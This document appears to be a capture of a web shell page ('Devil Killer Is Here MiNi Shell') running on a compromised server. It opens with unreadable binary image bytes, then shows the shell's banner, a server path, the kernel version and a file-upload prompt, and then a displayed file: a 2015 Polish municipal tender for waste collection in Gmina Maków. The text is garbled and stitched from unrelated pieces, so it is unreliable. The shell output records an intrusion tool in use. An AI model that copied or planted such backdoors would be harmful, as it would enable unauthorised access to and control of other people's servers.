JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151204/331366-N-2015.html

<p class="kh_header"><b>Maków: Odbiór i zagospodarowanie odpadów komunalnych pochodzących od właścicieli nieruchomości na, których zamieszkują mieszkańcy, położonych na terenie Gminy Maków.</b><br>
<b>Numer ogłoszenia: 331366 - 2015; data zamieszczenia: 04.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Maków , ul. Główna 12, 96-124 Maków, woj. łódzkie, tel. 046 8312017, faks 046 8312009.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych pochodzących od właścicieli nieruchomości na, których zamieszkują mieszkańcy, położonych na terenie Gminy Maków..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest odbiór i zagospodarowanie odpadów komunalnych pochodzących od właścicieli nieruchomości, na których zamieszkują mieszkańcy, położonych na terenie gminy Maków. Zamówienie obejmuje: 1 wyposażenie wszystkich nieruchomości objętych odbiorem odpadów w pojemniki na odpady oraz wyposażenie w pojemniki punktów, w których odbywać się będzie zbiórka przeterminowanych leków i zużytych baterii, a także utrzymanie tych pojemników w odpowiednim stanie sanitarnym, porządkowym i technicznym, 2 odbieranie i zagospodarowanie odpadów komunalnych pochodzących od właścicieli nieruchomości, na których zamieszkują mieszkańcy, położonych na terenie gminy Maków, 3 zorganizowanie, utrzymanie i obsługę punktu selektywnego zbierania odpadów komunalnych oraz odbieranie i zagospodarowanie odpadów komunalnych zgromadzonych w tym punkcie, zorganizowanie i obsługę objazdowej zbiórki odpadów od właścicieli nieruchomości, na których zamieszkują mieszkańcy oraz zagospodarowanie zebranych odpadów. Wyposażenie wszystkich nieruchomości objętych odbiorem odpadów w pojemniki na odpady oraz wyposażenie w pojemniki punktów, w których odbywać się będzie zbiórka przeterminowanych leków i zużytych baterii, a także utrzymanie tych pojemników w odpowiednim stanie sanitarnym, porządkowym i technicznym. 1 Na czas realizacji zamówienia, w ramach przedmiotu zamówienia, Wykonawca zobowiązany będzie do zapewnienia właścicielom nieruchomości, na których zamieszkują mieszkańcy, pojemników na odpady przystosowanych do opróżniania mechanicznego o pojemności od 120 litrów do 240 litrów zgodnie z uchwałą w sprawie regulaminu utrzymania czystości i porządku na terenie gminy Maków. 2 Pojemniki o różnych kolorach z przeznaczeniem na : odpady komunalne zmieszane odpady opakowaniowe szklane odpady frakcji: papier, tektura, metal, tworzywa sztuczne, opakowania wielomateriałowe, 3 Minimalna pojemność pojemnika do zbierania niesegregowanych zmieszanych odpadów komunalnych, zgodnie z uchwałą w sprawie regulaminu utrzymania czystości i porządku na terenie gminy Maków wynosi 120l i 240l. 4 Minimalna pojemność pojemnika do selektywnego zbierania odpadów komunalnych wynosi 120 l. 5 Szczegółowe dane charakteryzujące zamówienie: liczba budynków jednorodzinnych oraz liczba miejsc do gromadzenia odpadów 1 500. liczba i rodzaj pojemników do gromadzenia odpadów komunalnych o poszczególnej pojemności: 120 l na odpady segregowane - 1800 240 l na odpady segregowane - 300 240 l na odpady suche - 1 520 240 l na szkło - 1 520 Dane przedstawione są zależne od Zamawiającego i mogą ulec zmianie stosownie do rzeczywistych potrzeb Zamawiającego przy uwzględnieniu powstawania nowych nieruchomości oraz migracji i naturalnego ruchu ludności, nie więcej niż o 10%. Szczegółowy wykaz nieruchomości (opracowany na podstawie złożonych deklaracji), które Wykonawca będzie musiał wyposażyć w pojemniki, Zamawiający dostarczy przy podpisywaniu umowy. Informacje podane w wykazie będą aktualizowane przez Zamawiającego na koniec każdego tygodnia. 6 Wykonawca w terminie 5 dni roboczych od daty przekazania mu aktualizacji wykazu, o którym mowa w pkt 6, zobowiązany będzie do dokonania wymiany pojemników na posesjach lub dostarczenia nowych lub dodatkowych pojemników stosownie do wprowadzonych zmian. 7 Wykonawca dostarczy mieszkańcom pojemniki na posesje w terminie do dnia 31.12.2015 r. W dniu 04.01.2015 r. Wykonawca przedłoży Zamawiającemu pisemne potwierdzenie wyposażenia w pojemniki nieruchomości objętych zamówieniem, podpisane przez osoby uprawnione, zawierające dane o ilości i rodzaju dostarczonych pojemników oraz informację o posesjach, do których pojemniki nie zostały dostarczone z podaniem przyczyny niedostarczenia. 8 Wykonawca wyposaży w terminie do dnia 31.12.2015 r. punkty, w których odbywać się będzie zbiórka przeterminowanych leków oraz punkty, w których odbywać się będzie zbiórka zużytych baterii w odpowiednie pojemniki. 9 Wykonawca dostarczy 2 szt. pojemników na przeterminowane leki o minimalnej pojemności 40l każdy oraz 9 szt. pojemników na zużytych baterii o minimalnej pojemności 30l każdy. 10 Wykonawca zobowiązany będzie do utrzymania, dostarczonych w ramach zamówienia pojemników, o których mowa w ppkt 1 i ppkt 9 w odpowiednim stanie sanitarnym, porządkowym i technicznym poprzez: a wymianę uszkodzonych pojemników na pełnowartościowe. 3. Odbieranie i zagospodarowanie odpadów komunalnych pochodzących od właścicieli nieruchomości, na których zamieszkują mieszkańcy, położonych na terenie gminy Maków. 1 Odpady będą odbierane z nieruchomości, na których zamieszkują mieszkańcy, położonych na terenie gminy Maków. 2 Wykonawca zobowiązany jest odebrać odpady komunalne umieszczone w pojemnikach na odpady i wystawione przez właściciela nieruchomości w każdej ilości. 3 W ramach zamówienia Wykonawca zobowiązany jest odbierać i zagospodarować następujące rodzaje odpadów: a Niesegregowane (zmieszane) odpady komunalne o kodzie 20 03 01, b Segregowane odpady komunalnych z podziałem na następujące frakcje: zmieszane odpady opakowaniowe o kodzie 15 01 06 papier, tektura, metal, tworzywa sztuczne, opakowania wielomateriałowe, opakowania ze szkła o kodzie 15 01 07, c Zużyte baterie o kodzie 20 01 34 z następujących punktów zlokalizowanych w placówkach oświatowych i obiektach użyteczności publicznej: Gimnazjum Św. Wojciecha Makowie, ul. Akacjowa 2; Szkoła Podstawowa im. ks. Jana Twardowskiego w Makowie, ul. Główna Gminne Przedszkole w Makowie, ul. Główna, Urząd Gminy Maków, Maków, ul. Główna 12. Szkoła Podstawowa w Świętem, Szkoła Podstawowa im. Bolesława Chrobrego w Pszczonowie, Szkoła Podstawowa w Słomkowie, Szkoła Podstawowa im. Jana Pawła II w Dąbrowicach, Szkoła Podstawowa im. Wyszyńskiego w Woli Makowskiej; d Przeterminowane leki o kodzie 20 01 32 z następujących punktów zlokalizowanych w aptece i obiekcie użyteczności publicznej: Apteka Rodzinna M.M. Smolczewscy, Maków, ul. Główna 20, Urząd Gminy Maków, Maków, ul. Główna 12, 4 Niesegregowane zmieszane odpady komunalne i segregowane odpady komunalne następujących frakcji: papier, tektura, metal, tworzywa sztuczne, opakowania wielomateriałowe i szkło, zgodnie z uchwałą w sprawie regulaminu utrzymania czystości i porządku na terenie gminy Maków stanowiącą załącznik nr 1 do SIWZ, będą odbierane z pojemników wyłącznie do tego celu przeznaczonych o pojemności od 120 litrów do 240 litrów. 5 Segregowane odpady komunalne, zgodnie z uchwałą w sprawie regulaminu utrzymania czystości i porządku na terenie gminy Maków stanowiącą załącznik nr 1 do SIWZ, będą odbierane z pojemników wyłącznie do tego celu przeznaczonych. 6 Wykonawca zobowiązany będzie do odbioru przeterminowanych lekarstw oraz zużytych baterii z pojemników ustawionych w punktach, o których mowa w ppkt 3 lit. c i d, w terminie 7 dnia roboczych od dnia otrzymania zgłoszenia od Zamawiającego. 4. Zorganizowanie, utrzymanie i obsługa punktu selektywnego zbierania odpadów komunalnych oraz odbieranie i zagospodarowanie odpadów komunalnych zgromadzonych w tym punkcie. W ramach zamówienia Wykonawca zorganizuje punkt selektywnego zbierania odpadów komunalnych zwany dalej PSZOK oraz będzie odbierał i zagospodarowywał odpady komunalne zgromadzone w PSZOK. PSZOK Wykonawca zorganizuje na nieruchomości, do której posiada tytuł prawny, w odległości nie większej niż 25 km od granicy Gminy Maków. Zakres zamówienia obejmuje odbiór i zagospodarowanie następujących odpadów: a odpady zielone o kodzie 20 02 01 z terenów zabudowy wielorodzinnej (zbierane od marca do listopada), b odpady budowlano - rozbiórkowych o kodach z grupy 17, c meble i odpady wielkogabarytowe o kodzie 20 03 07, d przeterminowane leki o kodzie 20 01 32, e chemikalia (farby, rozpuszczalniki, oleje odpadowe) o kodach 20 01 13*, 20 01 14*, 20 01 15*, 20 01 19*, 20 01 27*, 20 01 29*, f zużyte baterie i akumulatory o kodzie 20 01 34, g zużyty sprzęt elektryczny i elektroniczny o kodach 20 01 23, 20 01 35*, 20 01 36, h zużyte opony o kodzie 16 01 03. 4 Wykonawca wyposaży PSZOK w odpowiednie pojemniki do gromadzenia opadów. Ilość i rodzaje pojemników muszą zapewnić prawidłową segregację wszystkich gromadzonych w PSZOK frakcji odpadów wymienionych w ppkt 3. 5 Wykonawca odpowiada za zachowanie na terenie PSZOK i wokół niego czystości i porządku. PSZOK będzie odbierał odpady od mieszkańców od poniedziałku do soboty w godz. 1000 - 1800. Do PSZOK mieszkańcy mogą oddawać, zgodnie z uchwałą w sprawie regulaminu utrzymania czystości i porządku na terenie gminy Maków, i uchwałą w sprawie szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów, , odpady wymienione w ppkt 3. Wykonawca zobowiązany jest do sukcesywnego wywozu odpadów z PSZOK tak, aby zapewnić możliwość ciągłego dostarczania odpadów przez mieszkańców. 5. Zorganizowanie i obsługa objazdowej zbiórki odpadów od właścicieli nieruchomości, na których zamieszkują mieszkańcy oraz zagospodarowani zebranych odpadów. 1 Przedmiot zamówienia obejmuje również zorganizowanie i obsługę systemu obwoźnego odbioru odpadów bezpośrednio z nieruchomości zamieszkałych znajdujących się na terenie gminy Maków wraz z zagospodarowaniem zebranych odpadów. 2 W ramach obwoźnego odbioru odpadów Wykonawca: a zbierze następujące rodzaje wystawionych odpadów: meble i odpady wielkogabarytowe (wersalki, tapczany, łóżka, fotele, elementy stolarki, okna, dywany, wykładziny) o kodzie 20 03 07, przeterminowane leki o kodzie 20 01 32, chemikalia (farby, rozpuszczalniki, oleje odpadowe) o kodach 20 01 13*, 20 01 14*, 20 01 15*, 20 01 19*, 20 01 27*, 20 01 29*, zużyte baterie i akumulatory o kodzie 20 01 34, zużyty sprzęt elektryczny i elektroniczny (lodówki, pralki, radia, drukarki, odkurzacze, telewizory, monitory) o kodach 20 01 23, 20 01 36, 20 01 35*, zużyte opony o kodzie 16 01 03, metale (złom) o kodzie 20 01 40. b załaduje na środek transportu, c posprząta miejsce, z którego odbierane były wystawione odpady, d zagospodaruje zebrane odpady. 3 Zbiórka nie obejmuje odpadów powstałych w trakcie prowadzonej działalności przez podmioty gospodarcze. 4 Objazdowa zbiórka odpadów będzie odbywała się nie rzadziej niż raz w roku zgodnie z uchwałą w sprawie regulaminu utrzymania czystości i porządku na terenie gminy Maków, i uchwałą w sprawie szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów. Zbiórka powinna być zrealizowany w okresie wrzesień -październik. 5 Objazdowa zbiórka odpadów powinna być zorganizowana w danej miejscowości w tym samym dniu tygodnia poza dniami ustawowo wolnymi od pracy niedziele i święta. 6 Termin zbiórki zostanie uzgodniony pomiędzy Zamawiającym a Wykonawcą. Wykonawca przedłoży zamawiającemu harmonogram przeprowadzenia zbiórki. 7 Wykonawca powiadomi właścicieli nieruchomości o terminie zbiórki w poszczególnych miejscowościach oraz zasadach zbiórki. 6. Częstotliwość odbierania odpadów. 1 Odpady komunalne, zgodnie z uchwałą w sprawie regulaminu utrzymania czystości i porządku na terenie gminy Maków, oraz uchwałą w sprawie szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów, będą odbierane z następującą częstotliwością: a niesegregowane zmieszane odpady komunalne - nie rzadziej niż raz na miesiąc, b segregowane odpady komunalne: zmieszane odpady opakowaniowe papier, tektura, metal, tworzywa sztuczne, opakowania wielomateriałowe - nie rzadziej niż raz na miesiąc, opakowania ze szkła - nie rzadziej niż raz na kwartał. 2 Odbiór i wywóz odpadów komunalnych wykonawca będzie realizował w poszczególnych miejscowościach zawsze w ten sam dzień tygodnia poza dniami wolnymi od pracy niedziele i święta. W przypadku, gdy wyznaczony dzień wywozu przypada na dzień ustawowo wolnym od pracy, Wykonawca odbierze odpady w pierwszym dniu roboczym po dniu wolnym. 3 W przypadku nowo zgłoszonej nieruchomości Wykonawca odbierze odpady z tej nieruchomości przy najbliższym odbiorze zgodnie z ustalonym harmonogramem wywozu. 4 Wykonawca jest zobowiązany do sporządzenia i przekazania Zamawiającemu do zaakceptowania: a niezwłocznie po podpisaniu umowy - harmonogramu wywozu odpadów z terenu gminy obejmującego okres od 1 stycznia do 31 grudnia 2015 r., 5 Harmonogram musi być tak skonstruowany by odbiór odpadów był regularny i powtarzalny, co ułatwi mieszkańcom przygotowanie i wystawianie odpadów do odbioru. 6 Wykonawca jest zobowiązany do dostarczenia właścicielom nieruchomości, na których zamieszkują mieszkańcy, harmonogramu wywozu odpadów w terminie do dnia 31.12.2014 roku dla okresu, o którym mowa w ppkt 4 lit. Wykonawca w terminie 5 dni roboczych od daty otrzymania aktualizacji wykazu nieruchomości, o którym mowa w pkt 3 ppkt 6, dostarczy harmonogram wywozu odpadów dla nowych nieruchomości. 7 Wykonawca będzie organizował i odbierał odpady, o których mowa w pkt 5 ppkt 2, w ramach systemu obwoźnego odbioru odpadów bezpośrednio z nieruchomości zamieszkałych nie rzadziej niż raz w roku. 8 Wykonawca zobowiązany jest do sukcesywnego wywozu odpadów z PSZOK tak, aby zapewnić możliwość ciągłego dostarczania odpadów przez mieszkańców. 7. Wykonawca zobowiązany jest do: 1 Odbioru i zagospodarowania odpadów komunalnych zgodnie z obowiązującymi przepisami prawa. Zakazuje się mieszania poszczególnych frakcji odpadów. Każdą frakcję odpadów należy odbierać oddzielnie. 2 Zapewnienia, dla właściwej realizacji przedmiotu zamówienia, przez cały czas trwania zamówienia dostatecznej ilości środków technicznych, gwarantujących terminowe i jakościowe wykonanie zakresu rzeczowego usług, jak również odpowiedniego personelu. 3 Opracowania trasy przejazdów tak, aby odpady odbierane były tylko na terenie Gminy Maków i tylko z nieruchomości, na których zamieszkują mieszkańcy. Nie dopuszcza się zbierania (dopełniania pojazdu odpadami) z terenu innej gminy lub z nieruchomości, na których nie zamieszkują mieszkańcy. 4 Każdorazowego uporządkowania terenu w przypadku wysypania odpadów podczas opróżniania pojemników. 5 Odebrania odpadów ze wszystkich nieruchomości zamieszkałych zgłoszonych przez Zamawiającego, bez względu na stopień trudności dojazdu do nieruchomości. 6 W sytuacjach nadzwyczajnych jak np. nieprzejezdność lub zamknięcie drogi, gdy nie jest możliwa realizacja usługi zgodnie z umową, sposób i termin odbioru odpadów będzie każdorazowo uzgadniany pomiędzy Zamawiającym a Wykonawcą i może polegać w szczególności na wyznaczeniu zastępczych miejsc gromadzenia odpadów przez właścicieli nieruchomości oraz innych terminów ich odbioru. 7 Przekazywania odebranych zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania zmieszanych odpadów komunalnych przeznaczonych do składowania do regionalnej instalacji przetwarzania odpadów komunalnych właściwej dla Regionu III lub w szczególnych przypadkach, do instalacji przewidzianej do zastępczej obsługi Regionu III zgodnie z Planem Gospodarki Odpadami dla Województwa Łódzkiego. 8 Przekazywania odebranych odpadów komunalnych selektywnie zebranych do ponownego użycia, odzysku lub unieszkodliwiania, zgodnie z hierarchią postępowania z odpadami, o której mowa w ustawie z dnia 14 grudnia 2012 r. o odpadach Dz.U. z 2013 r. poz. 21 lub samodzielnego zagospodarowania zgodnie z obowiązującymi przepisami. 9 Prowadzenia kart ewidencji odpadów zgodnie z obowiązującymi przepisami. 10 Uzyskania poziomu ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania w poszczególnych latach zgodnie z Rozporządzeniem Ministra Środowiska z dn. 25.05.2012 r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczania masy tych odpadów Dz. U. z 2012 r., poz. 676. 11 Uzyskania: a poziomu recyklingu i przygotowania do ponownego użycia następujących frakcji odpadów komunalnych: papieru, metali, tworzyw sztucznych i szkła, b poziomu recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami innych niż niebezpieczne odpadów budowlanych i rozbiórkowych w poszczególnych latach zgodnie z Rozporządzeniem Ministra Środowiska z dnia 29.05.2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych Dz. U. 2012 r., poz. 645. 12 W przypadku stwierdzenia, że właściciel nieruchomości nie wywiązuje się z obowiązku segregacji odpadów, Wykonawca zobowiązany jest do odebrania odpadów jako zmieszanych oraz: a sporządzenia niezwłocznie protokołu określającego m.in.: adres punktu odbioru odpadów, dzień wywozu odpadów oraz opis nieprawidłowości, b sporządzenia dokumentacji fotograficznej (w wersji cyfrowej, sporządzonej w sposób pozwalający udokumentować formę i zakres naruszenia oraz lokalizację zdarzenia z widoczną na zdjęciu datą), dokumentacja fotograficzna stanowi załącznik do protokołu, c umieszczenia na pokrywie pojemnika znacznika np. samoprzylepna kartka informującej właściciela nieruchomości o otrzymaniu ostrzeżenia za nie przestrzeganie obowiązku segregowania odpadów, d przekazania Zamawiającemu drogą elektroniczną dokumentacji, o której mowa w lit. a i b, w terminie 3 dni roboczych od zaistnienia sytuacji. 13 Przekazywania Zamawiającemu dokumentacji związanej z przedmiotem zamówienia: a w dniu 1 stycznia 2015 r. pisemnego potwierdzenia wyposażenia w pojemniki nieruchomości, zawierającego dane o ilości i rodzaju dostarczonych pojemników oraz informację o posesjach, do których pojemniki nie zostały dostarczone z podaniem przyczyny niedostarczenia. b dwumiesięcznych raportów zawierających określenie ilości i rodzajów przekazywanych pojemników w danym miesiącu w terminie 14 dni od zakończenia danego miesiąca, c dwumiesięcznych raportów zawierających zestawienie ilości poszczególnych rodzajów odebranych i zagospodarowanych odpadów w terminie 14 dni od zakończenia danego miesiąca, d sprawozdań, o których mowa w art. 9n ustawy o utrzymaniu czystości i porządku w gminach w terminie do końca miesiąca następującego po kwartale, którego sprawozdanie dotyczy, e sprawozdanie, o którym mowa w lit. d należy złożyć odrębnie dla nieruchomości, na których zamieszkują mieszkańcy (przedmiot zamówienia) i odrębnie dla pozostałych nieruchomości, od których Wykonawca poza przedmiotem zamówienia odbiera odpady komunalne, f jako załączniki do faktury dwumiesięcznej Wykonawca załączy: dwumiesięczny raport, o którym mowa w lit. c, karty przekazania odpadów uwzględniające datę, kod, rodzaj i wagę przekazanych odpadów komunalnych do regionalnej instalacji przetwarzania odpadów komunalnych. Karty przekazania odpadów, o których mowa w zdaniu poprzednim, muszą jednoznacznie stwierdzać, że odpady pochodzą z terenu gminy Maków. 8. Standard sanitarny wykonywania usług i ochrony środowiska: 1 Wykonawca świadcząc usługi objęte przedmiotem zamówienia winien przestrzegać zasad wynikających z prawa ochrony środowiska, ustawy o odpadach, ustawy o utrzymaniu czystości i porządku w gminach oraz ich aktów wykonawczych. 2 Wykonawca będzie tak prowadził usługi by nie dochodziło do wysypywania odpadów podczas przemieszczania pojemników do samochodu oraz załadunku i transportu odpadów. 3 Każdorazowego uporządkowania terenu w przypadku wysypania odpadów podczas opróżniania pojemników. 4 Pojazdy i urządzenia powinny być poddawane myciu i dezynfekcji z częstotliwością nie rzadziej niż raz na miesiąc, a w okresie 05.2015 - 08.2015 raz na dwa tygodnie. 9. Informacje dodatkowe: 1 Mapa poglądowa gminy stanowi załącznik nr 3 do SIWZ. 2 Powierzchnia gminy: 82,97 km2. 3 Ilość odpadów zebranych w 2013 roku na terenie gminy przez firmy odbierające odpady wskazana ilość zebranych odpadów podana została jedynie pomocniczo i może ulec zmianie.: Lp. Rodzaj odpadu Kod odpadu Łączna ilość odpadów w Mg 1 Niesegregowane zmieszane odpady komunalne 20 03 01 579,40 2 Zmieszane odpady opakowaniowe papier, tektura, metal, tworzywa sztuczne, opakowania wielomateriałowe 15 01 06 52,60 3 Opakowania ze szkła 15 01 07 71,20 4 Opakowania z tworzyw sztycznych 15 01 02 5,10 5 Meble i odpady wielkogabarytowe, w tym: 20 03 07 78,20 zużyty sprzęt elektryczny i elektroniczny lodówki, pralki, radia, drukarki, odkurzacze, telewizory, monitory 20 01 23, 20 01 36, 20 01 35* metale złom 20 01 40 meble i odpady wielkogabarytowe wersalki, tapczany, łóżka, fotele, elementy stolarki, okna, dywany, wykładziny 20 03 07 zużyte baterie i akumulatory 20 01 34, 20 01 33 odpady zielone 20 02 01 6 Zużyte opony 16 01 03 5,00 10. Przedmiot zamówienia powinien być wykonywany zgodnie z wymogami wynikającymi z obowiązujących przepisów prawa, w szczególności: 1 ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach t.j. Dz. U. z 2012 poz. 391 z późn. zm., 2 ustawy z dnia 14 grudnia 2012 r. o odpadach Dz. U. z 2013 r., poz.21, 3 rozporządzenia Ministra Środowiska z dnia 15 maja 2012 r. w sprawie wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi Dz. U. z 2012 poz.630, 4 rozporządzenia Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych Dz. U. z 2012 poz. 645, 5 rozporządzenia Ministra Środowiska z dnia 25 maja 2012 r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczenia masy tych odpadów Dz. U. z 2012 poz. 676, 6 rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości Dz. U. z 2013 r., poz. 122, 7 Wojewódzkiego Planu Gospodarki Odpadami Województwa Łódzkiego 2012 - Uchwała nr XXVI48212 Sejmiku Województwa Łódzkiego z dnia 21.06.2012 r. w sprawie wykonania Planu Gospodarki Odpadami dla województwa łódzkiego 2012 r., 8akt prawa miejscowego obowiązujących na obszarze Gminy Maków: a uchwała Nr XXIX16713 Rady Gminy Maków z dnia 1 marca 2013 r. w sprawie regulaminu utrzymania czystości i porządku na terenie gminy Lipce Reymontowskie Dz. Urz. Woj. Łódzkiego z dnia 23 kwietnia 2013 r. poz. 2254 - załącznik nr 1 do SIWZ b uchwała Nr XXVII15912 Rady Gminy Maków z dnia 27 grudnia 2012 r. w sprawie szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów Dz. Urz. Woj. Łódzkiego z dnia 26 lutego 2013 r. poz. 1056 i uchwała Nr XXXI18213 Rady Gminy Maków z dnia 26 kwietnia 2013 r. 